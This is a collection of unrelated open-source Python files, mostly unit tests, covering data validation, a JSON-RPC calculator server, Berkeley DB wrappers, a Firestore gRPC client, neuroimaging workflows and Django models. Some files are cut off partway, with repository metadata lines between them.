print("===study 3")
args = ['--study_directory', 'test_data/study_es_3/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(3, exit_status)
def test_html_output(self):
'''
Test if html file is correctly generated when 'html_table' is given
'''
#Build up arguments and run
out_file_name = 'test_data/study_es_0/result_report.html~'
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
|
args = validateData.interface(args)
# Execute main function with arguments provided through sy
|
s.argv
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
self.assertFileGenerated(out_file_name,
'test_data/study_es_0/result_report.html')
def test_portal_mismatch(self):
'''Test if validation fails when data contradicts the portal.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--portal_info_dir', PORTAL_INFO_DIR, '--verbose']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 1)
def test_no_portal_checks(self):
'''Test if validation skips portal-specific checks when instructed.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--verbose',
'--no_portal_checks']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 3)
def test_problem_in_clinical(self):
'''Test whether the script aborts if the sample file cannot be parsed.
Further files cannot be validated in this case, as all sample IDs will
be undefined. Validate if the script is giving the proper error.
'''
# build the argument list
out_file_name = 'test_data/study_wr_clin/result_report.html~'
print('==test_problem_in_clinical==')
args = ['--study_directory', 'test_data/study_wr_clin/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
# TODO - set logger in main_validate and rea
|
nooperpudd/pulsar
|
examples/calculator/tests.py
|
Python
|
bsd-3-clause
| 9,018
| 0.000887
|
'''Tests the RPC "calculator" example.'''
import unittest
import types
from pulsar import send
from pulsar.apps import rpc, http
from pulsar.apps.test import dont_run_with_thread
from .manage import server, Root, Calculator
class TestRpcOnThread(unittest.TestCase):
app_cfg = None
concurrency = 'thread'
# used for both keep-alive and timeout in JsonProxy
# long enough to allow to wait for tasks
rpc_timeout = 500
@classmethod
def setUpClass(cls):
name = 'calc_' + cls.concurrency
s = server(bind='127.0.0.1:0', name=name, concurrency=cls.concurrency)
cls.app_cfg = yield from send('arbiter', 'run', s)
cls.uri = 'http://{0}:{1}'.format(*cls.app_cfg.addresses[0])
cls.p = rpc.JsonProxy(cls.uri, timeout=cls.rpc_timeout)
@classmethod
def tearDownClass(cls):
if cls.app_cfg:
return send('arbiter', 'kill_actor', cls.app_cfg.name)
def setUp(self):
self.assertEqual(self.p.url, self.uri)
self.assertTrue(str(self.p))
proxy = self.p.bla
self.assertEqual(proxy.name, 'bla')
self.assertEqual(proxy.url, self.uri)
self.assertEqual(proxy._client, self.p)
self.assertEqual(str(proxy), 'bla')
def test_wsgi_handler(self):
cfg = self.app_cfg
self.assertTrue(cfg.callable)
wsgi_handler = cfg.callable.setup({})
self.assertEqual(len(wsgi_handler.middleware), 2)
router = wsgi_handler.middleware[1]
self.assertEqual(router.route.path, '/')
root = router.post
self.assertEqual(len(root.subHandlers), 1)
hnd = root.subHandlers['calc']
self.assertFalse(hnd.isroot())
self.assertEqual(hnd.subHandlers, {})
# Pulsar server commands
def test_ping(self):
response = yield from self.p.ping()
self.assertEqual(response, 'pong')
def test_functions_list(self):
result = yield from self.p.functions_list()
self.assertTrue(result)
d = dict(result)
self.assertTrue('ping' in d)
self.assertTrue('echo' in d)
self.assertTrue('functions_list' in d)
self.assertTrue('calc.add' in d)
self.assertTrue('calc.divide' in d)
def test_time_it(self):
'''Ping server 5 times'''
bench = yield from self.p.timeit('ping', 5)
self.assertTrue(len(bench.result), 5)
self.assertTrue(bench.taken)
# Test Object method
def test_check_request(self):
result = yield from self.p.check_request('check_request')
self.assertTrue(result)
def test_add(self):
response = yield from self.p.calc.add(3, 7)
self.assertEqual(response, 10)
def test_subtract(self):
response = yield from self.p.calc.subtract(546, 46)
self.assertEqual(response, 500)
def test_multiply(self):
response = yield from self.p.calc.multiply(3, 9)
self.assertEqual(response, 27)
def test_divide(self):
response = yield from self.p.calc.divide(50, 25)
self.assertEqual(response, 2)
def test_info(self):
response = yield from self.p.server_info()
self.assertTrue('server' in response)
server = response['server']
self.assertTrue('version' in server)
app = response['monitors'][self.app_cfg.name]
if self.concurrency == 'thread':
self.assertFalse(app['workers'])
worker = app
else:
workers = app['workers']
self.assertEqual(len(workers), 1)
worker = workers[0]
name = '%sserver' % self.app_cfg.name
if name in worker:
self._check_tcpserver(worker[name]['server'])
def _check_tcpserver(self, server):
sockets = server['sockets']
if sockets:
self.assertEqual(len(sockets), 1)
sock = sockets[0]
self.assertEqual(sock['address'],
'%s:%s' % self.app_cfg.addresses[0])
def test_invalid_params(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.add,
50, 25, 67)
def test_invalid_params_fromApi(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.divide,
50, 25, 67)
def test_invalid_function(self):
p = self.p
yield from self.async.assertRaises(rpc.NoSuchFunction, p.foo, 'ciao')
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo.sjdcbjcb)
def testInternalError(self):
return self.async.assertRaises(rpc.InternalError, self.p.calc.divide,
'ciao', 'bo')
def testCouldNotserialize(self):
return self.async.assertRaises(rpc.InternalError, self.p.dodgy_method)
def testpaths(self):
'''Fetch a sizable ammount of data'''
response = yield from self.p.calc.randompaths(num_paths=20, size=100,
mu=1, sigma=2)
self.assertTrue(response)
def test_echo(self):
response = yield from self.p.echo('testing echo')
self.assertEqual(response, 'testing echo')
def test_docs(self):
handler = Root({'calc': Calculator})
self.assertEqual(handler.parent, None)
self.assertEqual(handler.root, handler)
self.assertRaises(rpc.NoSuchFunction, handler.get_handler,
'cdscsdcscd')
calc = handler.subHandlers['calc']
self.assertEqual(calc.parent, handler)
self.assertEqual(calc.root, handler)
docs = handler.docs()
self.assertTrue(docs)
response = yield from self.p.documentation()
self.assertEqual(response, docs)
def test_batch_one_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
def test_batch_few_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
call_id2 = bp.calc.add(1, 1)
self.assertIsNotNone(call_id2)
self.assertEqual(len(bp), 2)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for in
|
d, batch_response in enumerate(batch_generator):
self.assertI
|
n(ind, (0, 1))
if call_id1 == batch_response.id:
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
elif call_id2 == batch_response.id:
self.assertEqual(batch_response.result, 2)
self.assertIsNone(batch_response.exception)
def test_batch_error_response_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping('wrong param')
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertIs
|
Jeff-Tian/mybnb
|
Python27/Lib/bsddb/test/test_all.py
|
Python
|
apache-2.0
| 19,765
| 0.011131
|
"""Run all test cases.
"""
import sys
import os
import unittest
try:
# For Pythons w/distutils pybsddb
import bsddb3 as bsddb
except ImportError:
# For Python 2.3
import bsddb
if sys.version_info[0] >= 3 :
charset = "iso8859-1" # Full 8 bit
class logcursor_py3k(object) :
def __init__(self, env) :
self._logcursor = env.log_cursor()
def __getattr__(self, v) :
return getattr(self._logcursor, v)
def __next__(self) :
v = getattr(self._logcursor, "next")()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
next = __next__
def first(self) :
v = self._logcursor.first()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def last(self) :
v = self._logcursor.last()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def prev(self) :
v = self._logcursor.prev()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def current(self) :
v = self._logcursor.current()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def set(self, lsn) :
v = self._logcursor.set(lsn)
if v is not None :
v = (v[0], v[1].decode(charset))
return v
class cursor_py3k(object) :
def __init__(self, db, *args, **kwargs) :
self._dbcursor = db.cursor(*args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbcursor, v)
def _fix(self, v) :
if v is None : return None
key, value = v
if isinstance(key, bytes) :
key = key.decode(charset)
return (key, value.decode(charset))
def __next__(self) :
v = getattr(self._dbcursor, "n
|
ext")()
return self._fix(v)
next = __next__
def previous(self) :
v = self._dbcursor.previous()
return self._fix(v)
def last(self) :
v = self._dbcursor.last()
return self._fix(v)
def set(self, k) :
i
|
f isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set(k)
return self._fix(v)
def set_recno(self, num) :
v = self._dbcursor.set_recno(num)
return self._fix(v)
def set_range(self, k, dlen=-1, doff=-1) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set_range(k, dlen=dlen, doff=doff)
return self._fix(v)
def dup(self, flags=0) :
cursor = self._dbcursor.dup(flags)
return dup_cursor_py3k(cursor)
def next_dup(self) :
v = self._dbcursor.next_dup()
return self._fix(v)
def next_nodup(self) :
v = self._dbcursor.next_nodup()
return self._fix(v)
def put(self, key, data, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, str) :
value = bytes(data, charset)
return self._dbcursor.put(key, data, flags=flags, dlen=dlen,
doff=doff)
def current(self, flags=0, dlen=-1, doff=-1) :
v = self._dbcursor.current(flags=flags, dlen=dlen, doff=doff)
return self._fix(v)
def first(self) :
v = self._dbcursor.first()
return self._fix(v)
def pget(self, key=None, data=None, flags=0) :
# Incorrect because key can be a bare number,
# but enough to pass testsuite
if isinstance(key, int) and (data is None) and (flags == 0) :
flags = key
key = None
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, int) and (flags==0) :
flags = data
data = None
if isinstance(data, str) :
data = bytes(data, charset)
v=self._dbcursor.pget(key=key, data=data, flags=flags)
if v is not None :
v1, v2, v3 = v
if isinstance(v1, bytes) :
v1 = v1.decode(charset)
if isinstance(v2, bytes) :
v2 = v2.decode(charset)
v = (v1, v2, v3.decode(charset))
return v
def join_item(self) :
v = self._dbcursor.join_item()
if v is not None :
v = v.decode(charset)
return v
def get(self, *args, **kwargs) :
l = len(args)
if l == 2 :
k, f = args
if isinstance(k, str) :
k = bytes(k, "iso8859-1")
args = (k, f)
elif l == 3 :
k, d, f = args
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(d, str) :
d = bytes(d, charset)
args =(k, d, f)
v = self._dbcursor.get(*args, **kwargs)
if v is not None :
k, v = v
if isinstance(k, bytes) :
k = k.decode(charset)
v = (k, v.decode(charset))
return v
def get_both(self, key, value) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(value, str) :
value = bytes(value, charset)
v=self._dbcursor.get_both(key, value)
return self._fix(v)
class dup_cursor_py3k(cursor_py3k) :
def __init__(self, dbcursor) :
self._dbcursor = dbcursor
class DB_py3k(object) :
def __init__(self, *args, **kwargs) :
args2=[]
for i in args :
if isinstance(i, DBEnv_py3k) :
i = i._dbenv
args2.append(i)
args = tuple(args2)
for k, v in kwargs.items() :
if isinstance(v, DBEnv_py3k) :
kwargs[k] = v._dbenv
self._db = bsddb._db.DB_orig(*args, **kwargs)
def __contains__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
return getattr(self._db, "has_key")(k)
def __getitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._db[k]
if v is not None :
v = v.decode(charset)
return v
def __setitem__(self, k, v) :
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(v, str) :
v = bytes(v, charset)
self._db[k] = v
def __delitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
del self._db[k]
def __getattr__(self, v) :
return getattr(self._db, v)
def __len__(self) :
return len(self._db)
def has_key(self, k, txn=None) :
if isinstance(k, str) :
k = bytes(k, charset)
return self._db.has_key(k, txn=txn)
def set_re_delim(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_delim(c)
def set_re_pad(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_pad(c)
def get_re_source(self) :
|
huyx/icall
|
setup.py
|
Python
|
lgpl-3.0
| 1,026
| 0.024366
|
# -*- coding: utf-8 -*-
from distutils.core import setup
import os.path
classifiers = [
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
"Operating System :: OS Independent",
"Topic :: S
|
oftware Development :: Li
|
braries :: Python Modules",
]
def read(fname):
fname = os.path.join(os.path.dirname(__file__), fname)
return open(fname).read().strip()
def read_files(*fnames):
return '\r\n\r\n\r\n'.join(map(read, fnames))
setup(
name = 'icall',
version = '0.3.4',
py_modules = ['icall'],
description = 'Parameters call function, :-)',
long_description = read_files('README.rst', 'CHANGES.rst'),
author = 'huyx',
author_email = 'ycyuxin@gmail.com',
url = 'https://github.com/huyx/icall',
keywords = ['functools', 'function', 'call'],
classifiers = classifiers,
)
|
GoogleCloudPlatform/grpc-gcp-python
|
firestore/examples/end2end/src/Write.py
|
Python
|
apache-2.0
| 2,967
| 0.013482
|
#! /usr/bin/python
import sys
import os
import json
import grpc
import time
import subprocess
from google.oauth2 import service_account
import google.oauth2.credentials
import google.auth.transport.requests
import google.auth.transport.grpc
from google.firestore.v1beta1 import firestore_pb2
from google.firestore.v1beta1 import firestore_pb2_grpc
from google.firestore.v1beta1 import document_pb2
from google.firestore.v1beta1 import document_pb2_grpc
from google.firestore.v1beta1 import common_pb2
from google.firestore.v1beta1 import common_pb2_grpc
from google.firestore.v1beta1 import write_pb2
from google.firestore.v1beta1 import write_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2
def first_message(database, write):
messages = [
firestore_pb2.WriteRequest(database = database, writes = [])
]
for msg in messages:
|
yield msg
def generate_messages(database, writes, stream_id, stream_token):
# writes can be an array and append to the messages, so it can write multiple Write
# here just write one as example
messages = [
firestore_pb2.WriteRequest(database=database, writes = []),
firestore_pb2.WriteRequest(database=database, writes = [writes], stream_id = stream_id, stream_token
|
= stream_token)
]
for msg in messages:
yield msg
def main():
fl = os.path.dirname(os.path.abspath(__file__))
fn = os.path.join(fl, 'grpc.json')
with open(fn) as grpc_file:
item = json.load(grpc_file)
creds = item["grpc"]["Write"]["credentials"]
credentials = service_account.Credentials.from_service_account_file("{}".format(creds))
scoped_credentials = credentials.with_scopes(['https://www.googleapis.com/auth/datastore'])
http_request = google.auth.transport.requests.Request()
channel = google.auth.transport.grpc.secure_authorized_channel(scoped_credentials, http_request, 'firestore.googleapis.com:443')
stub = firestore_pb2_grpc.FirestoreStub(channel)
database = item["grpc"]["Write"]["database"]
name = item["grpc"]["Write"]["name"]
first_write = write_pb2.Write()
responses = stub.Write(first_message(database, first_write))
for response in responses:
print("Received message %s" % (response.stream_id))
print(response.stream_token)
value_ = document_pb2.Value(string_value = "foo_boo")
update = document_pb2.Document(name=name, fields={"foo":value_})
writes = write_pb2.Write(update_mask=common_pb2.DocumentMask(field_paths = ["foo"]), update=update)
r2 = stub.Write(generate_messages(database, writes, response.stream_id, response.stream_token))
for r in r2:
print(r.write_results)
if __name__ == "__main__":
main()
|
autodefrost/sandbox
|
python/test_rel_import/package1/subpackage2/module1h.py
|
Python
|
apache-2.0
| 88
| 0.011364
|
from ..subpackage1 import module1g
def func1h():
print('1h')
module1g.fu
|
nc1g()
|
|
astraw/PyUniversalLibrary
|
examples/ulai01.py
|
Python
|
bsd-3-clause
| 1,869
| 0
|
# Copyright (c) 2005, California Institute of Technology
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the California Institute of Te
|
chnol
|
ogy nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Author: Andrew Straw
import UniversalLibrary as UL
BoardNum = 0
Gain = UL.BIP5VOLTS
Chan = 0
while 1:
DataValue = UL.cbAIn(BoardNum, Chan, Gain)
EngUnits = UL.cbToEngUnits(BoardNum, Gain, DataValue)
print DataValue, EngUnits
|
carlohamalainen/volgenmodel-nipype
|
new_data_to_atlas_space.py
|
Python
|
bsd-3-clause
| 4,566
| 0
|
#!/usr/bin/env python3
import os
import os.path
from nipype.interfaces.utility import IdentityInterface, Function
from nipype.interfaces.io import SelectFiles, DataSink, DataGrabber
from nipype.pipeline.engine import Workflow, Node, MapNode
from nipype.interfaces.minc import Resample, BigAverage, VolSymm
import argparse
def create_workflow(
xfm_dir,
xfm_pattern,
atlas_dir,
atlas_pattern,
source_dir,
source_pattern,
work_dir,
out_dir,
name="new_data_to_atlas_space"
):
wf = Workflow(name=name)
wf.base_dir = os.path.join(work_dir)
datasource_source = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_source'
)
datasource_source.inputs.base_directory = os.path.abspath(source_dir)
datasource_source.inputs.template = source_pattern
datasource_xfm = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_xfm'
)
datasource_xfm.inputs.base_directory = os.path.abspath(xfm_dir)
datasource_xfm.inputs.template = xfm_pattern
datasource_atlas = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_atlas'
)
datasource_atlas.inputs.base_directory = os.path.abspath(atlas_dir)
datasource_atlas.inputs.template = atlas_pattern
resample = MapNode(
interface=Resample(
sinc_interpolation=True
),
name='resample_',
iterfield=['input_file', 'transformation']
)
wf.connect(datasource_source, 'outfiles', resample, 'input_file')
wf.connect(datasource_xfm, 'outfiles', resample, 'transformation')
wf.connect(datasource_atlas, 'outfiles', resample, 'like')
bigaverage = Node(
interface=BigAverage(
output_float=True,
robust=False
),
name='bigaverage',
iterfield=['input_file']
)
wf.connect(resample, 'output_file', bigaverage, 'input_files')
datasink = Node(
interface=DataSink(
base_directory=out_dir,
container=out_dir
),
name='datasink'
)
wf.connect([(bigaverage, datasink, [('output_file', 'average')])])
wf.connect([(resample, datasink, [('output_file', 'atlas_space')])])
wf.connect([(datasource_xfm, datasink, [('outfiles', 'transforms')])])
return wf
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--name",
type=str,
required=True
)
parser.add_argument(
"--xfm_dir",
type=str,
requir
|
ed=True
)
parser.add_argument(
"--xfm_pattern",
type=str,
required=True
)
parser.add_argument(
"--source_dir",
type=str,
required=True
)
parser.add_argument(
|
"--source_pattern",
type=str,
required=True
)
parser.add_argument(
"--atlas_dir",
type=str,
required=True
)
parser.add_argument(
"--atlas_pattern",
type=str,
required=True
)
parser.add_argument(
"--work_dir",
type=str,
required=True
)
parser.add_argument(
"--out_dir",
type=str,
required=True
)
parser.add_argument(
'--debug',
dest='debug',
action='store_true',
help='debug mode'
)
args = parser.parse_args()
if args.debug:
from nipype import config
config.enable_debug_mode()
config.set('execution', 'stop_on_first_crash', 'true')
config.set('execution', 'remove_unnecessary_outputs', 'false')
config.set('execution', 'keep_inputs', 'true')
config.set('logging', 'workflow_level', 'DEBUG')
config.set('logging', 'interface_level', 'DEBUG')
config.set('logging', 'utils_level', 'DEBUG')
wf = create_workflow(
xfm_dir=os.path.abspath(args.xfm_dir),
xfm_pattern=args.xfm_pattern,
atlas_dir=os.path.abspath(args.atlas_dir),
atlas_pattern=args.atlas_pattern,
source_dir=os.path.abspath(args.source_dir),
source_pattern=args.source_pattern,
work_dir=os.path.abspath(args.work_dir),
out_dir=os.path.abspath(args.out_dir),
name=args.name
)
wf.run(
plugin='MultiProc',
plugin_args={
'n_procs': int(
os.environ["NCPUS"] if "NCPUS" in os.environ else os.cpu_count
)
}
)
|
south-coast-science/scs_core
|
src/scs_core/data/queue_report.py
|
Python
|
mit
| 4,239
| 0.006841
|
"""
Created on 26 Aug 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from collections import OrderedDict
from enum import Enum
from scs_core.data.json import JSONReport
# --------------------------------------------------------------------------------------------------------------------
class QueueReport(JSONReport):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jdict(cls, jdict, skeleton=False):
if not jdict:
return QueueReport(0, ClientStatus.WAITING, False)
length = jdict.get('length')
client_state = ClientStatus[jdict.get('client-state')]
publish_success = jdict.get('publish-success')
return QueueReport(length, client_state, publish_success)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, length, client_state, publish_success):
"""
Constructor
"""
self.__length = length # int or None
self.__client_state = client_state # int
self.__publish_success = publish_success # bool
# ----------------------------------------------------------------------------------------------------------------
def queue_state(self):
# client INHIBITED...
if self.client_state == ClientStatus.INHIBITED:
return QueueStatus.INHIBITED
# client WAITING...
if self.client_state == ClientStatus.WAITING:
return QueueStatus.STARTING
# client CONNECTING...
if self.client_state == ClientStatus.CONNECTING:
return QueueStatus.CONNECTING
# client CONNECTED...
if self.client_state == ClientStatus.CONNECTED:
if self.length == 0:
return QueueStatus.WAITING_FOR_DATA
if self.publish_success:
return QueueStatus.PUBLISHING
return QueueStatus.QUEUING
# unknown / error...
return QueueStatus.NONE
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['length'] = self.length
jdict['client-state'] = self.client_state.name
jdict['publish-success'] = self.publish_success
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def length(self):
return self.__length
@length.setter
def length(self, length):
self.__length = length
@property
def client_state(self):
return self.__client_state
@client_state.setter
def client_state(self, client_state):
self.__client_state = client_state
@property
def publish_success(self):
return self.__publish_success
@publish_success.setter
def publish_success(self, publish_success):
self.__publish_success = publish_success
# --------------------------------------------------------------
|
--------------------------------------------------
def __str__(self, *args, **kwargs):
return "QueueReport:{length:%s, client_state:%s, publish_success:%s}" % \
(self.length, self.client_state, self.publish_success)
# ----------------------
|
----------------------------------------------------------------------------------------------
class ClientStatus(Enum):
"""
classdocs
"""
NONE = 0
INHIBITED = 1
WAITING = 2
CONNECTING = 3
CONNECTED = 4
# --------------------------------------------------------------------------------------------------------------------
class QueueStatus(Enum):
"""
classdocs
"""
NONE = 1
INHIBITED = 2
STARTING = 3
CONNECTING = 4
WAITING_FOR_DATA = 5
PUBLISHING = 6
QUEUING = 7
CLEARING = 8
|
arokem/nipy
|
nipy/labs/utils/tests/test_misc.py
|
Python
|
bsd-3-clause
| 2,093
| 0.010511
|
#!/usr/bin/env python
import numpy as np
from scipy import special
from ..routines import median, mahalanobis, gamln, psi
from nose.tools import assert_true
from numpy.testing import assert_almost_equal, assert_equal, TestCase
class TestAll(TestCase):
def test_median(self):
x = np.random.rand(100)
assert_almost_equal(median(x), np.median(x))
def test_median2(self):
x = np.random.rand(101)
assert_equal(median(x), np.median(x))
def test_median3(self):
x = np.random.rand(10, 30, 11)
assert_almost_equal(np.squeeze(median(x,axis=1)), np.median(x,axis=1))
def test_mahalanobis0(self):
x = np.ones(100)
A = np.eye(100)
mah = 100.
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis1(self):
x = np.random.rand(100)
A = np.random.rand(100, 100)
A = np.dot(A.transpose(), A) + np.eye(100)
mah = np.dot(x, np.dot(np.linalg.inv(A), x))
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis2(self):
x = np.random.rand(100,3,4)
Aa = np.zeros([100,100,3,4])
for i in range(3):
for j in range(4):
A = np.random.rand(100,100)
A = np.dot(A.T, A)
Aa[:,:,i,j] = A
i = np.random.randint(3)
j = np.random.randint(4)
mah = np.dot(x[:,i,j], np.dot(np.lina
|
lg.inv(Aa[:,:,i,j]), x[:,i,j]))
f_mah = (mahalanobis(x, Aa))[i,j]
assert_true(np.allclose(mah, f_mah))
def test_gamln(self):
|
for x in (0.01+100*np.random.random(50)):
scipy_gamln = special.gammaln(x)
my_gamln = gamln(x)
assert_almost_equal(scipy_gamln, my_gamln)
def test_psi(self):
for x in (0.01+100*np.random.random(50)):
scipy_psi = special.psi(x)
my_psi = psi(x)
assert_almost_equal(scipy_psi, my_psi)
if __name__ == "__main__":
import nose
nose.run(argv=['', __file__])
|
CroceRossaItaliana/jorvik
|
anagrafica/migrations/0047_auto_20170525_2011.py
|
Python
|
gpl-3.0
| 865
| 0.001156
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-05-25 20:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('anagrafica', '0046_delega_stato'),
]
operations = [
migrations.AlterIndexTogether(
name='delega',
index_together=set([('persona', 'tipo', 'stato'), ('inizio', 'fine
|
', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('tipo', 'oggetto_tipo', 'oggetto_id'), ('persona', 'inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'stato'), ('persona', 'stato'), ('persona', 'inizio', 'fine'), ('inizio', 'fine', 'tipo'), ('pe
|
rsona', 'inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('persona', 'tipo'), ('oggetto_tipo', 'oggetto_id'), ('inizio', 'fine', 'stato'), ('inizio', 'fine')]),
),
]
|
davivcgarcia/wttd-15
|
eventex/core/tests/test_models_speaker_contact.py
|
Python
|
gpl-3.0
| 3,199
| 0
|
# coding: utf-8
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.test import TestCase
from django.core.exceptions import ValidationError
from eventex.core.models import Speaker, Contact
class SpeakerModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
self.speaker.save()
def test_create(self):
"""
Speaker instance must be saved.
"""
self.assertEqual(1, self.speaker.pk)
def test_unicode(self):
"""
Speaker string representation should be the name.
"""
self.assertEqual(u'Davi Garcia', unicode(self.speaker))
class ContactModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker.objects.create(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
def test_email(self):
"""
Speaker should have email co
|
ntact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='E',
value='henrique@bastos.net'
)
self.assertEqual(1, contact.pk)
def test_phone(self):
"""
|
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='P',
value='21-987654321'
)
self.assertEqual(1, contact.pk)
def test_fax(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
